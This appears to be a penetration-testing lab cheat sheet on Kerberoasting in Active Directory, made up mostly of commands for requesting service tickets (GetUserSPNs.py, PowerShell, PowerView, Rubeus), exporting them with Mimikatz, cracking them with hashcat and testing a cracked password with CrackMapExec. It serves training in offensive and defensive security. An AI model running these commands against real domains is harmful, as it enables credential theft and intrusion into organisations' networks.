Kerberoasting

Kerberoasting Overview

This attack targets Service Principal Names (SPNs) accounts.
- Purpose of Service Principal Names (SPN) in Active Directory
  - SPNs are unique identifiers that Kerberos uses to map a service instance to a service account in whose context the service is running
    Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY\LOCAL SERVICE.

Kerberoasting - Performing the Attack

Depending on your position in a network, this attack can be performed in multiple ways:
- From a non-domain joined Linux host using valid domain user credentials.
- From a domain-joined Linux host as root after retrieving the keytab file.
- From a domain-joined Windows host authenticated as a domain user.
- From a domain-joined Windows host with a shell in the context of a domain account.
- As SYSTEM on a domain-joined Windows host.
- From a non-domain joined Windows host using runas /netonly.

Kerberoasting - from Linux

Kerberoasting with GetUserSPNs.py

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

Requesting all TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Requesting a Single TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Cracking the Ticket Offline with Hashcat

crack with Hashcat

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

password is database!

Testing Authentication against a Domain Controller

CrackMapExec

sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!

Kerberoasting - from Windows

Manual way

Enumerating SPNs with setspn.executes

setspn.exe -Q */*

Targeting a Single User

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

The Add-Type cmdlet is used to add a .NET framework class to our PowerShell session, which can then be instantiated like any .NET framework object
The -AssemblyName parameter allows us to specify an assembly that contains types that we are interested in using
System.IdentityModel is a namespace that contains different classes for building security token services
We'll then use the New-Object cmdlet to create an instance of a .NET Framework object
We'll use the System.IdentityModel.Tokens namespace with the KerberosRequestorSecurityToken class to create a security token and pass the SPN name to the class to request a Kerberos TGS ticket for the target account in our current logon session

Retrieving All Tickets Using setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extracting Tickets from Memory with Mimikatz

Mimikatz

mimikatz # base64 /out:true

mimikatz # kerberos::list /export

echo "<base64 blob>" |  tr -d \\n

cat encoded_file | base64 -d > sqldev.kirbi

kirbi2john.py sqldev.kirbi

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Hashcat

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Automated / Tool Based Route

Using PowerView to Extract TGS Tickets

Import-Module .\PowerView.ps1

Get-DomainUser * -spn | select samaccountname

Using PowerView to Target a Specific User

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exporting All Tickets to a CSV File

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Using Rubeus

.\Rubeus.exe kerberoast /stats

 .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Using the /tgtdeleg Flag

/tgtdeleg flag, the tool requested an RC4 ticket even though the supported encryption types are listed as AES 128/256

Reference

https://adsecurity.org/?p=3458

PreviousLDAP Filtering Explained NextMimikatz

Last updated 1 year ago